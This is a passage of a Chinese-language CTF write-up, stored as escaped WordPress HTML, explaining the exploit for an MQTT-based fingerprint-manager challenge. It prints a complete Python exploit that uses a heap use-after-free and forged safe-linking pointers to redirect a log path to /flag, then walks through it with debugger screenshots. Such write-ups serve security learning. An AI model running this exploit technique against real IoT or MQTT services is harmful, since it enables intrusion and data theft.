src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-844\"  sizes=\"(max-width: 961px) 100vw, 961px\" \/><\/div><\/figure>\n\n\n\n<p>\u5c31\u53ef\u4ee5\u6109\u5feb\u7684\u5f00\u542f\u8c03\u8bd5\u4e86<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"EXP%E8%AE%B2%E8%A7%A3\"><\/span>EXP\u8bb2\u89e3<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E5%AE%8C%E6%95%B4EXP%E5%A6%82%E4%B8%8B\"><\/span>\u5b8c\u6574EXP\u5982\u4e0b<span class=\"ez-toc-section-end\"><\/span><\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>import paho.mqtt.client as mqtt\nfrom pwn import *\nimport time\nfrom time import sleep\nimport ssl\nimport re\nimport json\n\n# MQTT Broker \u914d\u7f6e\nBROKER = \"0.0.0.0\"\n\nPORT = 8883\n# PORT = 50806\nCAFILE = \".\/_rootfs.cpio.extracted\/cpio-root\/etc\/mosquitto\/certs\/ca.crt\"\nCERTFILE = \".\/_rootfs.cpio.extracted\/cpio-root\/etc\/mosquitto\/certs\/server.crt\"\nKEYFILE = \".\/_rootfs.cpio.extracted\/cpio-root\/etc\/mosquitto\/certs\/server.key\"\nAUTH_TOKEN_TOPIC = \"auth_token\"\nVALID_TOKEN_TOPIC = \"validtoken123123\"\nSESSION_ID_TOPIC = \"#\"  # \u4e00\u5f00\u59cb\u8ba2\u9605\u6240\u6709\u4e3b\u9898 (#)\nmytime = 1\n# \u7528\u4e8e\u5b58\u50a8\u63a5\u6536\u5230\u7684\u6d88\u606f\nreceived_messages = &#91;]\n\n\ndef pay(input_str, mylen=80):\n    # \u5982\u679c\u5b57\u7b26\u4e32\u957f\u5ea6\u5c0f\u4e8e80\uff0c\u4f7f\u7528\u590d\u5236\u65b9\u5f0f\u586b\u5145\u81f380\n    while len(input_str) &lt; mylen:\n        input_str += input_str\n\n    # \u786e\u4fdd\u5b57\u7b26\u4e32\u7684\u957f\u5ea6\u6070\u597d\u4e3a80\n    input_str = input_str&#91;:mylen]\n\n    # \u521d\u59cb\u5316\u7ed3\u679c\u6570\u7ec4\n    result = &#91;]\n\n    # \u6bcf4\u4e2a\u5b57\u7b26\u4e00\u7ec4\n    for i in range(0, len(input_str), 4):\n        # \u53d64\u4e2a\u5b57\u7b26\n        chunk = input_str&#91;i:i + 4]\n\n        # \u5c064\u4e2a\u5b57\u7b26\u8f6c\u6362\u4e3a\u5bf9\u5e94\u7684\u5341\u516d\u8fdb\u5236\u6570\u5b57\n        hex_value = 0\n        for char in chunk:\n            hex_value = (hex_value &lt;&lt; 8) + ord(char)\n\n        # \u5c06\u7ed3\u679c\u6dfb\u52a0\u5230\u6570\u7ec4\u4e2d\n        result.append(hex_value)\n\n    return result\n\n\ndef on_connect(client, userdata, flags, rc):\n    \"\"\"\u8fde\u63a5\u5230 MQTT Broker \u65f6\u7684\u56de\u8c03\u51fd\u6570\"\"\"\n    print(f\"Connected to MQTT Broker with result code {rc}\")\n    client.subscribe(SESSION_ID_TOPIC)  # \u8ba2\u9605\u6240\u6709\u4e3b\u9898 (#)\uff0c\u83b7\u53d6\u6240\u6709\u6d88\u606f\n\n\ndef on_message(client, userdata, msg):\n    \"\"\"\u63a5\u6536\u5230\u6d88\u606f\u65f6\u7684\u56de\u8c03\u51fd\u6570\"\"\"\n    print(f\"Received message on topic {msg.topic}: {msg.payload.decode()}\")\n    userdata.append(msg.payload.decode())  # \u4fdd\u5b58\u63a5\u6536\u5230\u7684\u6d88\u606f\n\n\ndef publish_message(client, topic, message):\n    \"\"\"\u53d1\u5e03\u6d88\u606f\u5230\u6307\u5b9a\u7684 MQTT \u4e3b\u9898\"\"\"\n    print(f\"Publishing message to {topic}: {message}\")\n    client.publish(topic, message, qos=1)\n\n\ndef send_auth_token(client):\n    \"\"\"\u53d1\u9001 auth_token \u6d88\u606f\"\"\"\n    message = \"validtoken123123\"\n    publish_message(client, AUTH_TOKEN_TOPIC, message)\n\n\ndef send_finger_data(client):\n    \"\"\"\u53d1\u9001\u6307\u7eb9\u6570\u636e\"\"\"\n    finger_data = \"&#91;1373378270,39159,3669886736,2494,2,515555555,2945791524,9283885,155241,259,30956741,169525,4196208728,2948318370,231700,2380113,8528,1416626613,3520135119,42949672977]\"\n    # finger_data = \"&#91;1373378309,39159,2147483775,2494,2,515555574,2147483758,9283884,155241,259,30956739,169525,2147483479,2147483548,231699,2380112,8528,1416626458,2147483496,292]\"\n    publish_message(client, VALID_TOKEN_TOPIC, finger_data)\n\n\ndef extract_session_id(messages):\n    \"\"\"\u4ece\u63a5\u6536\u5230\u7684\u6d88\u606f\u4e2d\u63d0\u53d6 session_id\"\"\"\n    for message in messages:\n        match = re.search(r\"session_id\\s*&#91;:=]\\s*(&#91;a-zA-Z0-9]+)\", message)\n        if match:\n            return match.group(1)  # \u8fd4\u56de\u63d0\u53d6\u5230\u7684 session_id\n    return None\n\n\ndef convert_array_to_string(array):\n    \"\"\"\u81ea\u52a8\u5c06\u6570\u7ec4\u8f6c\u6362\u4e3a\u5b57\u7b26\u4e32\uff0c\u683c\u5f0f\u4e3a \"&#91;\\\"element1\\\",\\\"element2\\\",...]\"\uff0c\u786e\u4fdd\u6ca1\u6709\u7a7a\u683c\"\"\"\n    return \"&#91;\" + \",\".join(f\"{item}\" for item in array) + \"]\"\n\n\ndef send_edit(client, session_id, index, payload):\n    \"\"\"\u53d1\u9001 edit_finger \u547d\u4ee4\uff0c\u786e\u4fdd req_args \u7b26\u5408\u683c\u5f0f\"\"\"\n    req_args = &#91;\n        str(index),  # \u7b2c\u4e00\u4e2a\u5143\u7d20\u662f\u7d22\u5f15\uff0c\u786e\u4fdd\u662f\u5b57\u7b26\u4e32\u7c7b\u578b\n        payload,\n    ]\n    json_message = {\n        \"session\": session_id,\n        \"request\": \"edit_finger\",\n        \"req_args\": req_args\n    }\n    # \u4f7f\u7528 json.dumps \u8fdb\u884c\u683c\u5f0f\u5316\uff0c\u786e\u4fdd\u6240\u6709\u5b57\u7b26\u4e32\u90fd\u7528\u53cc\u5f15\u53f7\u5305\u88f9\n    publish_message(client, \"manager\", json.dumps(json_message))\n    sleep(mytime)\n\n\ndef send_add_command(client, session_id, payload):\n    \"\"\"\u53d1\u9001 add_finger \u547d\u4ee4\uff0c\u786e\u4fdd req_args \u7b26\u5408\u683c\u5f0f\"\"\"\n    payload = pay(payload, 88)\n    req_args = &#91;\n        convert_array_to_string(payload)  # \u6307\u7eb9\u6570\u636e\u8f6c\u4e3a\u5b57\u7b26\u4e32\u683c\u5f0f\n    ]\n    json_message = {\n        \"session\": session_id,\n        \"request\": \"add_finger\",\n        \"req_args\": req_args\n    }\n    # \u4f7f\u7528 json.dumps \u8fdb\u884c\u683c\u5f0f\u5316\n    publish_message(client, \"manager\", json.dumps(json_message))\n    sleep(mytime)\n\n\ndef send_add(client, session_id, payload):\n    \"\"\"\u53d1\u9001 add_finger \u547d\u4ee4\uff0c\u786e\u4fdd req_args \u7b26\u5408\u683c\u5f0f\"\"\"\n    req_args = &#91;payload]\n    json_message = {\n        \"session\": session_id,\n        \"request\": \"add_finger\",\n        \"req_args\": req_args\n    }\n    # \u4f7f\u7528 json.dumps \u8fdb\u884c\u683c\u5f0f\u5316\n    publish_message(client, \"manager\", json.dumps(json_message))\n    sleep(mytime)\n\n\ndef send_log(client, session_id, payload):\n    \"\"\"\u53d1\u9001 add_finger \u547d\u4ee4\uff0c\u786e\u4fdd req_args \u7b26\u5408\u683c\u5f0f\"\"\"\n    req_args = &#91;payload]\n    json_message = {\n        \"session\": session_id,\n        \"request\": \"add_finger\",\n        \"req_args\": req_args\n    }\n    # \u4f7f\u7528 json.dumps \u8fdb\u884c\u683c\u5f0f\u5316\n    publish_message(client, \"logger\", \"download\")\n    sleep(mytime)\n\n\ndef send_malloc(client, session_id, payload):\n    \"\"\"\u53d1\u9001 add_finger \u547d\u4ee4\uff0c\u786e\u4fdd req_args \u7b26\u5408\u683c\u5f0f\"\"\"\n    req_args = &#91;payload]\n    json_message = {\n        \"session\": session_id + \" aaaabaa\/\/\/\/flagaeaaafaaagaaahaaaiaaajaaakaaalaa\\x0a\\x0aaaanaaaoaaapa\" + \"\/flag\" + \"\\x10\\x00\\x00\\x00\\x00\\x00\\x00\",\n        \"request\": \"kiddingyou\",\n        \"req_args\": req_args\n    }\n    # \u4f7f\u7528 json.dumps \u8fdb\u884c\u683c\u5f0f\u5316\n    publish_message(client, \"manager\", json.dumps(json_message))\n    sleep(mytime)\n\n\ndef send_remove_command(client, session_id, index):\n    \"\"\"\u53d1\u9001 remove_finger \u547d\u4ee4\uff0c\u786e\u4fdd req_args \u7b26\u5408\u683c\u5f0f\"\"\"\n    payload = pay(\"12345678\")\n    req_args = &#91;\n        f\"{index}\", convert_array_to_string(payload)\n    ]\n    json_message = {\n        \"session\": session_id,\n        \"request\": \"remove_finger\",\n        \"req_args\": req_args\n    }\n    # \u4f7f\u7528 json.dumps \u8fdb\u884c\u683c\u5f0f\u5316\n    publish_message(client, \"manager\", json.dumps(json_message))\n    sleep(mytime)\n\n\ndef main():\n    # \u521b\u5efa MQTT \u5ba2\u6237\u7aef\u5b9e\u4f8b\n    client = mqtt.Client(userdata=received_messages)\n\n    # \u914d\u7f6e SSL \u8fde\u63a5\n    client.tls_set(ca_certs=CAFILE, certfile=CERTFILE, keyfile=KEYFILE)\n    client.tls_insecure_set(True)\n\n    # \u8bbe\u7f6e\u56de\u8c03\u51fd\u6570\n    client.on_connect = on_connect\n    client.on_message = on_message\n\n    # \u8fde\u63a5\u5230 MQTT Broker\n    print(f\"Connecting to MQTT Broker at {BROKER}:{PORT}...\")\n    client.connect(BROKER, PORT, 60)\n\n    # \u542f\u52a8\u63a5\u6536\u6d88\u606f\u7684\u5faa\u73af\n    client.loop_start()\n\n    # \u53d1\u9001\u8ba4\u8bc1 token\n    send_auth_token(client)\n    print(\"\\033&#91;33mSent auth token and finger data.\\033&#91;0m\")\n    time.sleep(mytime)  # \u7b49\u5f85\u6d88\u606f\u53d1\u9001\n\n    # \u53d1\u9001\u6709\u6548\u7684\u6307\u7eb9\u6570\u636e\n    send_finger_data(client)\n    print(\"\\033&#91;33mSent finger data.\\033&#91;0m\")\n    time.sleep(mytime)  # \u7b49\u5f85\u6d88\u606f\u53d1\u9001\n\n    # \u83b7\u53d6 session_id\uff0c\u76d1\u542c\u63a5\u6536\u5230\u7684\u6d88\u606f\n    print(\"Waiting for session_id...\")\n    time.sleep(mytime)  # \u7b49\u5f85\u4e00\u6bb5\u65f6\u95f4\u6765\u63a5\u6536\u6d88\u606f\n\n    # \u63d0\u53d6 session_id \u5e76\u6839\u636e session_id \u53bb\u8ba2\u9605\u8be5 session \u7684\u4e3b\u9898\n    session_id = extract_session_id(received_messages)\n\n    # session_id=\"02wakqZtjQ5rDm9G\"\n\n    if session_id:\n        print(f\"Session ID received: {session_id}\")\n        # \u8fd9\u91cc\u7528\u7b2c\u4e00\u4e2a\u547d\u4ee4\u884c\u53c2\u6570\n        offset = 0\n\n        # \u8ba2\u9605\u8be5 session_id \u4e3b\u9898\u5e76\u7b49\u5f85\u63a5\u6536\u6307\u7eb9\u7ba1\u7406\u76f8\u5173\u7684\u6d88\u606f\n        client.subscribe(f\"{session_id}\")\n        # \u53d6\u6d88\u8ba2\u9605\u5168\u90e8\n        client.unsubscribe(SESSION_ID_TOPIC)\n        time.sleep(mytime)  # \u7b49\u5f85\u6d88\u606f\n        # 2 add free\n        send_add(client, session_id,\n                 \"&#91;1633771874,a,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]\")\n        pause()\n        # uaf \u4fee\u6539fd\u4e3a\u81ea\u5df1-8\n        heap = 0x387898 + offset\n        xor = (heap - 8) ^ (heap &gt;&gt; 12)\n        send_edit(client, session_id, 2,\n                  f\"&#91;{xor},0,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,97,0,0,0,0,0,0]\")\n        pause()\n        # \u7533\u8bf7\u5230\u81ea\u5df13\n        send_add(client, session_id,\n                 \"&#91;1,2,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]\")\n        # \u7533\u8bf7\u5230\u81ea\u5df1-8,\u4e3a4\n        pause()\n        send_add(client, session_id,\n                 \"&#91;0,97,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]\")\n        # \u6b64\u5904\u4fee\u6539next,\u4e3a\u65e5\u5fd7\u8def\u5f84\n        log_path = 0x35b1f0 + offset\n        send_edit(client, session_id, 3, f\"&#91;1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,703710,703710,{log_path},9]\")\n        send_remove_command(client, session_id, 3)\n        send_remove_command(client, session_id, 1)\n        tmp1 = 0x39d8e0 + offset\n        tmp2 = 0x389108 + offset\n        tmp3 = 0x35b4d8 + offset\n        tmp4 = 0x399c20 + offset\n        tmp5 = 0x39a240 + offset\n        send_edit(client, session_id, 625,\n                  f\"&#91;{tmp1},1,{tmp2},19,30,0,0,0,{tmp3},5,1634493999,103,0,0,0,0,0,0,{tmp4},{tmp5},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,]\")\n        pause()\n        client.subscribe(\"#\")\n        send_log(client, session_id, \"\/flag\")\n        if \"flag{\" in received_messages or \"TPCTF{\" in received_messages or \"tpctf{\" in received_messages:\n            flag = (received_messages)\n            return flag\n        return 0\n    else:\n        print(\"No session ID found in received messages.\")\n\n    # \u505c\u6b62 MQTT \u5ba2\u6237\u7aef\u7684\u5faa\u73af\u5e76\u65ad\u5f00\u8fde\u63a5\n    client.loop_stop()\n    client.disconnect()\n\n\nif __name__ == \"__main__\":\n    main()<\/code><\/pre>\n\n\n\n<p>\u63a5\u4e0b\u6765\u6211\u4eec\u8be6\u7ec6\u8bb2\u4e00\u4e0bexp\u7684\u539f\u7406<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># \u521b\u5efa MQTT \u5ba2\u6237\u7aef\u5b9e\u4f8b\n    client = mqtt.Client(userdata=received_messages)\n\n    # \u914d\u7f6e SSL \u8fde\u63a5\n    client.tls_set(ca_certs=CAFILE, certfile=CERTFILE, keyfile=KEYFILE)\n    client.tls_insecure_set(True)\n\n    # \u8bbe\u7f6e\u56de\u8c03\u51fd\u6570\n    client.on_connect = on_connect\n    client.on_message = on_message\n\n    # \u8fde\u63a5\u5230 MQTT Broker\n    print(f\"Connecting to MQTT Broker at {BROKER}:{PORT}...\")\n    client.connect(BROKER, PORT, 60)\n\n    # \u542f\u52a8\u63a5\u6536\u6d88\u606f\u7684\u5faa\u73af\n    client.loop_start()\n<\/code><\/pre>\n\n\n\n<p>\u9996\u5148\u662fmqtt\u670d\u52a1\u5668\u7684\u521d\u59cb\u5316\u64cd\u4f5c\uff0c\u540e\u9762\u90fd\u53ef\u4ee5\u76f4\u63a5\u62ff\u6765\u590d\u7528\uff0c\u76ee\u7684\u662f\u94fe\u63a5mqtt\u7684broker\uff0c\u521d\u59cb\u5316\u63a5\u6536\u6d88\u606f\uff0c\u5b8c\u6210\u8fde\u63a5\u7b49\u64cd\u4f5c\u7684\u56de\u8c03\u51fd\u6570<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># \u53d1\u9001\u8ba4\u8bc1 token\n    send_auth_token(client)\n    print(\"\\033&#91;33mSent auth token and finger data.\\033&#91;0m\")\n    time.sleep(mytime)  # \u7b49\u5f85\u6d88\u606f\u53d1\u9001\n\n    # \u53d1\u9001\u6709\u6548\u7684\u6307\u7eb9\u6570\u636e\n    send_finger_data(client)\n    print(\"\\033&#91;33mSent finger data.\\033&#91;0m\")\n    time.sleep(mytime)  # \u7b49\u5f85\u6d88\u606f\u53d1\u9001\n\n    # \u83b7\u53d6 session_id\uff0c\u76d1\u542c\u63a5\u6536\u5230\u7684\u6d88\u606f\n    print(\"Waiting for session_id...\")\n    time.sleep(mytime)  # \u7b49\u5f85\u4e00\u6bb5\u65f6\u95f4\u6765\u63a5\u6536\u6d88\u606f\n\n    # \u63d0\u53d6 session_id \u5e76\u6839\u636e session_id \u53bb\u8ba2\u9605\u8be5 session \u7684\u4e3b\u9898\n    session_id = extract_session_id(received_messages)<\/code><\/pre>\n\n\n\n<p>\u7136\u540e\u5c31\u662f\u8981\u53d1\u9001\u8ba4\u8bc1token\uff0c\u53d1\u9001\u6210\u529f\u4e4b\u540e\uff0c\u83b7\u5f97\u4e00\u4e2a\u4f1a\u8bdd\uff0c\u7136\u540e\u5982\u679c\u6307\u7eb9\u9a8c\u8bc1\u6210\u529f\uff0c\u5c31\u53ef\u4ee5\u83b7\u5f97\u8be5\u4f1a\u8bdd\u7684session_id\uff0c\u800c\u6b63\u786e\u7684\u6307\u7eb9\u6570\u636e\u5c31\u662f\u901a\u8fc7\u524d\u9762\u7684\u7206\u7834exp\u83b7\u5f97<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> # 2 add free\n        send_add(client, session_id,\n                 \"&#91;1633771874,a,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]\")\n        pause()\n        # uaf \u4fee\u6539fd\u4e3a\u81ea\u5df1-8\n        heap = 0x387898 + offset\n        xor = (heap - 8) ^ (heap >> 12)\n        send_edit(client, session_id, 2,\n                  f\"&#91;{xor},0,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,97,0,0,0,0,0,0]\")\n        pause()\n        # \u7533\u8bf7\u5230\u81ea\u5df13\n        send_add(client, session_id,\n                 \"&#91;1,2,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]\")\n        # \u7533\u8bf7\u5230\u81ea\u5df1-8,\u4e3a4\n        pause()\n        send_add(client, session_id,\n                 \"&#91;0,97,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]\")\n        # \u6b64\u5904\u4fee\u6539next,\u4e3a\u65e5\u5fd7\u8def\u5f84\n        log_path = 0x35b1f0 + offset\n        send_edit(client, session_id, 3, f\"&#91;1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,703710,703710,{log_path},9]\")\n        send_remove_command(client, session_id, 3)\n        send_remove_command(client, session_id, 1)\n        tmp1 = 0x39d8e0 + offset\n        tmp2 = 0x389108 + offset\n        tmp3 = 0x35b4d8 + offset\n        tmp4 = 0x399c20 + offset\n        tmp5 = 0x39a240 + offset\n        send_edit(client, session_id, 625,\n                  f\"&#91;{tmp1},1,{tmp2},19,30,0,0,0,{tmp3},5,1634493999,103,0,0,0,0,0,0,{tmp4},{tmp5},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,]\")<\/code><\/pre>\n\n\n\n<p>\u8fd9\u4e00\u6bb5\u5c31\u662f\u653b\u51fb\u7684\u6838\u5fc3\u4ee3\u7801\uff0c\u63a5\u4e0b\u6765\u7ed3\u5408\u8c03\u8bd5\u8fdb\u884c\u8bb2\u89e3\uff0c\u5efa\u8bae\u8bfb\u8005\u5728\u9605\u8bfb\u65f6\u9010\u884c\u4e0b\u65ad\u70b9\u8c03\u8bd5\u67e5\u770b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-89.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"624\" height=\"133\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-89.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-845\"  sizes=\"(max-width: 624px) 100vw, 624px\" \/><\/div><\/figure>\n\n\n\n<p>\u7b2c\u4e00\u6b21\u76ee\u7684\u662f\u5236\u9020uaf<\/p>\n\n\n\n<p>\u521a\u521amalloc\u5b8c\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-90.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"813\" height=\"431\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-90.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-846\"  sizes=\"(max-width: 813px) 100vw, 813px\" \/><\/div><\/figure>\n\n\n\n<p>\u88abfree\u6389\u4e4b\u540e\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-91-1024x340.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"340\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-91-1024x340.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-847\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u5229\u7528edit\u4fee\u6539\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-92.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"747\" height=\"42\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-92.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-848\" style=\"width:840px;height:auto\"  sizes=\"(max-width: 747px) 100vw, 747px\" \/><\/div><\/figure>\n\n\n\n<p>\u7531\u4e8elog\u5b57\u7b26\u4e32\u5bf9\u5e94\u7684\u4f2a\u9020\u5806\u5757\uff0c\u5728finger_id\u504f\u79fb\u5904\u503c\u4e3a0x271\uff0c\u6240\u4ee5\u4e0b\u4e00\u6b21edit\u8981\u8bbe\u7f6efinger_id\u4e3a0x271=625\uff0c\u5176\u4f59\u503c\u4fdd\u6301\u4e0d\u53d8\u5373\u53ef<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-93.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"824\" height=\"619\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-93.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-849\"  sizes=\"(max-width: 824px) 100vw, 824px\" \/><\/div><\/figure>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u6b64\u65f6log\u5b57\u7b26\u4e32\u5df2\u7ecf\u4fee\u6539\u6210\u4e86\/flag<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-94-1024x316.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"316\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-94-1024x316.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-850\"  sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u590d\u73b0\u6210\u529f\uff01<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-95-1024x561.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" width=\"1024\" height=\"561\" data-original=\"http:\/\/39.104.51.85\/wp-content\/uploads\/2025\/11\/image-95-1024x561.png\" 